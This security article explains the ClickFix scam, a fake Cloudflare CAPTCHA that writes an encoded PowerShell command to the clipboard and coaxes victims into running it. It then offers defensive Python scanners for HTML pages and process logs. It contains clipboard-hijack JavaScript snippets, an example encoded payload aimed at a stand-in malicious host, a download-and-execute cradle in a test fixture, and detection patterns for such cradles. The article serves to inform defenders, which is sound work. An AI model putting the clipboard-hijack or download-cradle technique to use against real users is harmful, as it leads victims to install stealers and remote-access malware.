
ClickFix Scam Masquerades as Cloudflare Check to Slip Malware

A new social engineering scam, nicknamed ClickFix, is making waves in the cybersecurity world by exploiting user trust in routine security checks.

Disguised as a Cloudflare CAPTCHA, known as the “Turnstile” interface, the attack lures unsuspecting victims into executing malware on their own systems through a technical sleight of hand that is deceptively simple yet alarmingly effective.

Fake Verification, Real Threat

Unlike classic phishing attacks, which rely on malicious downloads or phishing forms, ClickFix leverages clipboard hijacking and user-aided code execution. Here’s how the technical workflow unfolds:

The fake Cloudflare page shown at the start of the attack
  1. Imitation Game: The attacker hosts a page that is a near-perfect replica of Cloudflare’s Turnstile CAPTCHA. This includes legitimate-looking branding, dynamically generated “Ray ID” numbers, and the correct domain references to avoid suspicion.
  2. Social Engineering via Familiar Prompts: Once a user lands on this page, either via a compromised website, a typo-squatted domain, or a malicious link, they are greeted with a message like: “Checking if the site connection is secure. Verify you are human.” After ticking the familiar “I’m not a robot” checkbox, a new set of instructions appears, guiding the user through “verification steps.” These usually say:
    • Press ⊞ Win+R (opening the Windows Run dialog)
    • Press Ctrl+V (to paste clipboard contents)
    • Press Enter (to run the pasted command)
  3. Clipboard Manipulation: At this point, a hidden JavaScript function on the page silently copies an obfuscated, Base64-encoded PowerShell command into the user’s clipboard. This critical step is performed using the modern Clipboard API, such as:

```javascript
navigator.clipboard.writeText('powershell -encodedcommand ...');
```

     The copied command typically fetches and executes a second-stage malware payload from a remote server.
  4. Unwitting Execution: When the user follows the instructions, their own keystrokes paste and execute the malicious command via Windows’ built-in tools like PowerShell or MSHTA. Because the user initiates this process, browser security mechanisms and endpoint protections (which might block downloads or flag unknown executables) are sidestepped.

The Malicious HTML Page

The ClickFix pages are often distributed as self-contained HTML files with all styles, images, and scripts embedded. The phishing code is deeply obfuscated to evade analysis and detection. Here’s a simplified breakdown:

  • Domain Spoofing: The HTML template dynamically displays the targeted website’s domain and a unique “Ray ID” string for authenticity.
  • Obfuscated Payloads: The PowerShell command is hidden (often Base64-encoded) to avoid simple pattern detection.
  • Clipboard API Abuse: The script forcibly overwrites whatever is in the user’s clipboard as soon as they interact with the page:

```javascript
document.querySelector('#checkbox').addEventListener('click', function() {
  navigator.clipboard.writeText(atob('UABvAHcAZQByAFMAaABlAGwAbAAg...'));
});
```
  • No External Resources: The page loads no third-party assets, making it easy for attackers to serve from compromised domains or typo-squatted lookalikes.
  • No Obvious Red Flags: There’s no file to download and no suspicious browser warnings, further lowering the guard of users.
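The characteristics listed above (clipboard write on interaction, a Base64 literal fed to atob(), Run-dialog instructions, Cloudflare-style verification text, and no external resources) can be turned into a static triage check for web proxy or mail-gateway scanning. The following scanner is an added example written for this article, not code from the page or from any vendor; the marker list and scoring are illustrative assumptions, and both HTML inputs are constructed fixtures (the fake-CAPTCHA one carries a harmless Write-Host command in place of a real payload).

```python
import base64
import re

# Static markers a ClickFix-style page tends to combine. Each adds to a score;
# none is conclusive alone, since legitimate sites also use the Clipboard API.
MARKERS = {
    "clipboard_write": re.compile(
        r"navigator\.clipboard\.writeText|execCommand\(\s*['\"]copy['\"]", re.I),
    "base64_decode": re.compile(r"\batob\s*\(", re.I),
    "run_dialog_instructions": re.compile(r"win\s*\+\s*r|ctrl\s*\+\s*v|run\s+dialog", re.I),
    "verification_theme": re.compile(
        r"verify you are human|checking if the site connection is secure|ray id", re.I),
}
# External scripts, stylesheets or images; a self-contained page has none.
EXTERNAL_RESOURCE = re.compile(
    r"<(?:script|link|img)[^>]+(?:src|href)\s*=\s*['\"]https?://", re.I)
# Base64 literals passed straight to atob(...)
BASE64_LITERAL = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")


def decoded_atob_literals(html):
    """Decode every base64 literal given to atob(); NUL bytes are stripped so a
    UTF-16LE string (the PowerShell -EncodedCommand convention) reads as text."""
    out = []
    for b64 in BASE64_LITERAL.findall(html):
        try:
            raw = base64.b64decode(b64, validate=True)
        except ValueError:
            continue
        out.append(raw.replace(b"\x00", b"").decode("utf-8", errors="replace"))
    return out


def assess_page(html):
    """Score an HTML document against the ClickFix markers and return the evidence."""
    found = [name for name, pat in MARKERS.items() if pat.search(html)]
    decoded = decoded_atob_literals(html)
    if any(re.search(r"powershell|mshta|cmd(?:\.exe)?\b", d, re.I) for d in decoded):
        found.append("decoded_command_text")
    external = len(EXTERNAL_RESOURCE.findall(html))
    score = len(found)
    if "clipboard_write" in found and external == 0:
        score += 1  # clipboard write on a fully self-contained page
    verdict = "likely_clickfix" if "clipboard_write" in found and score >= 3 else "inconclusive"
    return {"markers": found, "decoded": decoded,
            "external_resources": external, "score": score, "verdict": verdict}


# Constructed fixture: the structure described in the article, with a harmless
# command in the clipboard payload. Not a real phishing page.
SAMPLE_FAKE_CAPTCHA = """
<html><body>
<h1>Checking if the site connection is secure</h1>
<p>Verify you are human. Ray ID: 8a1b2c3d4e5f</p>
<input type="checkbox" id="checkbox"> I'm not a robot
<ol><li>Press Win+R</li><li>Press Ctrl+V</li><li>Press Enter</li></ol>
<script>
document.querySelector('#checkbox').addEventListener('click', function () {
  navigator.clipboard.writeText(atob('%s'));
});
</script>
</body></html>
""" % base64.b64encode(
    'powershell -w hidden -c "Write-Host constructed-sample"'.encode("utf-16le")).decode()

# Constructed fixture: an ordinary docs page with a copy-to-clipboard button.
SAMPLE_BENIGN = """
<html><body>
<script src="https://cdn.example.invalid/app.js"></script>
<pre id="snippet">npm install example</pre>
<button onclick="navigator.clipboard.writeText(document.getElementById('snippet').innerText)">Copy</button>
</body></html>
"""

if __name__ == "__main__":
    for name, page in (("fake captcha", SAMPLE_FAKE_CAPTCHA), ("benign", SAMPLE_BENIGN)):
        print(name, assess_page(page))
```

The verdict deliberately requires a clipboard write plus at least two further markers, so a normal "copy snippet" button does not trip it; the decoded atob() content is returned alongside the markers so an analyst can see what would have landed in the clipboard.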

Human Factors Meet Technical Subtlety

Despite its low-tech approach, ClickFix remains effective due to a blend of technical concealment and psychological manipulation:

  • Verification Fatigue: Modern users are conditioned to click through CAPTCHAs and security checks without skepticism, especially when presented with familiar branding.
  • Trust in Appearance: The replicas are pixel-perfect; users are unlikely to double-check the domain when faced with a recognizable interface and HTTPS padlock.
  • URL Deception: Attackers may use domains nearly identical to real services (e.g., notionbox.org vs. notion.com) or even inject the code into legitimate, compromised websites.
  • Invisible Execution: By using clipboard and built-in system utilities instead of suspicious EXE downloads, attackers bypass many layers of endpoint security.

Typical Payload Example

A common obfuscated PowerShell payload might look like:

```powershell
powershell -encodedCommand "JAB3AGUAYgBjAGwAaQBlAG4AdAAgAD0AIgBoAHQAdABwADoALwAvAGUAdgBpAGwALgBlAHgAZQAiADsAIgBwAG8AdwBlAHIAcABvAHMAdABqAG8AagBvAG4AUgBlAG0AbwB0AGUALgBQAG8AdwBlAHIAUwBoAGUAbABsAC4AUgBlAHIAbwBLAGkAZAAoACkAIg=="
```

Decoded, this command typically downloads and executes a malicious payload, such as Lumma Stealer, Stealc, or RATs like NetSupport Manager.
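Because the pasted command (workflow steps 3 and 4 above) runs through PowerShell's -EncodedCommand switch, the Base64 blob in a process-creation log line is the defender's best pivot: decoding it is mechanical (it is UTF-16LE text, not UTF-8), and the decoded script can then be matched against download-and-execute indicators. The following analyzer is an added example written for this article, not code from the page; the indicator list is an illustrative assumption, and the two log lines are constructed, with a harmless example.invalid URL standing in for a real staging server.

```python
import base64
import re
import shlex

# Indicators commonly associated with "fetch and run a second stage" in a decoded
# PowerShell command, plus the hidden-window switch seen on the raw command line.
# Illustrative list, not exhaustive.
INDICATOR_PATTERNS = {
    "invoke_expression": re.compile(r"invoke-expression|\biex\b", re.I),
    "download_cradle": re.compile(
        r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I),
    "remote_url": re.compile(r"https?://", re.I),
    "mshta": re.compile(r"\bmshta\b", re.I),
    "nested_base64": re.compile(r"frombase64string", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
}


def is_encoded_flag(token):
    """True for -EncodedCommand and the abbreviations PowerShell accepts (-e, -ec, -enc, ...)."""
    if not token.startswith("-") or len(token) < 2:
        return False
    return "encodedcommand".startswith(token[1:].lower())


def decode_encoded_command(b64):
    """Decode an -EncodedCommand argument: base64 over a UTF-16LE string. None if not base64."""
    try:
        raw = base64.b64decode(b64, validate=True)
    except ValueError:
        return None
    return raw.decode("utf-16le", errors="replace")


def encode_command(script):
    """Inverse of the above; used here only to build test input."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def analyze_command_line(cmdline):
    """Decode any -EncodedCommand argument and score the line for indicators."""
    try:
        tokens = [t.strip("\"'") for t in shlex.split(cmdline, posix=False)]
    except ValueError:  # unbalanced quotes: fall back to whitespace split
        tokens = cmdline.split()
    result = {"encoded": False, "decoded": None, "indicators": [], "verdict": "benign"}
    for i, tok in enumerate(tokens):
        if is_encoded_flag(tok) and i + 1 < len(tokens):
            decoded = decode_encoded_command(tokens[i + 1])
            if decoded is not None:
                result["encoded"] = True
                result["decoded"] = decoded
            break
    # Search both the raw line (switches) and the decoded script (cradle).
    haystack = cmdline + "\n" + (result["decoded"] or "")
    result["indicators"] = [n for n, p in INDICATOR_PATTERNS.items() if p.search(haystack)]
    if (result["encoded"] and result["indicators"]) or len(result["indicators"]) >= 2:
        result["verdict"] = "suspicious"
    return result


def scan_lines(lines):
    """Analyze every log line that invokes PowerShell or MSHTA."""
    return [(line, analyze_command_line(line)) for line in lines
            if re.search(r"powershell|pwsh|mshta", line, re.I)]


# Constructed sample telemetry (not from a real incident): a ClickFix-style encoded
# download cradle pointing at a reserved example.invalid host, and a benign admin command.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
SAMPLE_LINES = [
    'CommandLine: powershell -w hidden -encodedCommand "' + encode_command(SAMPLE_SCRIPT) + '"',
    'CommandLine: powershell -Command "Get-Process | Sort-Object CPU"',
]

if __name__ == "__main__":
    for line, verdict in scan_lines(SAMPLE_LINES):
        print(verdict["verdict"], verdict["indicators"], verdict["decoded"])
```

The switch matching mirrors PowerShell's own prefix parsing (it honours -e, -ec, -enc and so on, not only the full -EncodedCommand), which matters because ClickFix samples vary the spelling to dodge naive string matches; the decoded script is returned with the verdict so the second-stage URL can be extracted for blocking.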

Priya
